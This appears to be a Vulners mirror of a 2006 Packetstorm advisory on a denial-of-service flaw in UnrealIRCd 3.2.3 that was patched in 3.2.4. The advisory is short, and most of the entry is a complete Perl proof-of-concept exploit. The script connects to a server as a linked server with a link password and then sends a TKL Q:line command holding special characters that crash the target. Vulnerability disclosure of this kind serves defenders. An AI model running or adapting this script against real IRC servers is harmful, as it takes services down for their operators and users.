Lucene search
K

UnrealIRCd3.2.3.pl.txt

🗓️ 10 Mar 2006 00:00:00Reported by Brandon MilnerType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

UnrealIRCd 3.2.3 vulnerable to Denial of Service via Q:line manipulation. Patched in 3.2.4.

Code
`-Description-  
UnrealIRCd 3.2.3 is vulnerable to strings sent from a linked server for adding/removing Q:lines with special characters. Could be sent through services.  
Fixed as of version 3.2.4  
  
-PoC-  
#!/usr/bin/perl  
  
# Denial of Service exploit for UnrealIRCd 3.2.3  
# Successfully tested on both Win32 and Linux versions.  
# [email protected] (Brandon Milner)  
  
use IO::Socket;  
print ("UnrealIRCd Server-Link Denial of Service exploit PoC by Redneck\n");  
  
#################  
# Variables #  
#################  
$spass = ("LinkPass"); # Link Password  
$lserver = ("your.server.name"); # Local Server name  
$rserver = ("remote.server.name"); # Link Server  
$rport = (6667); # Link Port  
$snum = (6); # Server numeric  
  
#################  
# Create socket #  
#################  
my $sock = new IO::Socket::INET (  
PeerAddr => $rserver,  
PeerPort => $rport,  
Proto => 'tcp',  
);  
  
#################  
# Connect #  
#################  
die "Couldn't create socket to $rserver / $rport!\n" unless $sock;  
sleep 5;  
print ("connected to server");  
print $sock ("PASS $spass\n");  
print ("PASS $spass\n");  
print $sock ("SERVER $lserver 1 $snum :PoC by Redneck\n");  
print ("SERVER $lserver 1 $snum :PoC by Redneck\n");  
sleep 5;  
print $sock ("TKL - q\x08Q *\x08PoC\n");  
print ("TKL - q\x08Q *\x08PoC\n");  
sleep 5;  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation